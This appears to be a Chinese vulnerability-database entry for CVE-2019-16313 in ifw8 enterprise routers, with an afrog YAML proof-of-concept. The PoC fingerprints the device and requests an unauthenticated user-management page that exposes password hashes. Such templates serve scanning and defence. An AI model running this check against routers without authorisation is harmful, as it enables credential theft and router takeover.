CVE-2019-16313: ifw8 Router ROM v4.31 Credential Discovery

日期: 2025-09-01 | 影响软件: ifw8 Router ROM | POC: 已公开

漏洞描述

蜂网互联企业级路由器v4.31存在接口未授权访问，导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器 app="蜂网互联-互联企业级路由器"

PoC代码[已公开]

id: CVE-2019-16313

info:
    name: ifw8 Router ROM v4.31 Credential Discovery
    author: cc_ci(https://github.com/cc8ci)
    severity: high
    description: |
        蜂网互联企业级路由器v4.31存在接口未授权访问，导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器
        app="蜂网互联-互联企业级路由器"
    reference:
        - http://wiki.peiqi.tech/wiki/iot/%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94/%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%20%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%20%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E%20CVE-2019-16313.html

rules:
    r0:
        request:
            method: GET
            path: /index.htm?PAGE=web
        expression: response.status == 200 && response.body.bcontains(b"www.ifw8.cn")
    r1:
        request:
            method: GET
            path: /action/usermanager.htm
        expression: response.status == 200 && "\"pwd\":\"[0-9a-z]{32}\"".bmatches(response.body)
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2019/CVE-2019-16313.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2019-16313: ifw8 Router ROM v4.31 - Credential Discovery POC

CVE-2019-0193: Apache Solr Remote Code Execution POC

CVE-2019-0230: Apache Struts <=2.5.20 - Remote Code Execution S2-059 POC

CVE-2019-10758: Mongo-Express Remote Code Execution POC

CVE-2019-11581: Atlassian Jira未授权服务端模板注入漏洞 POC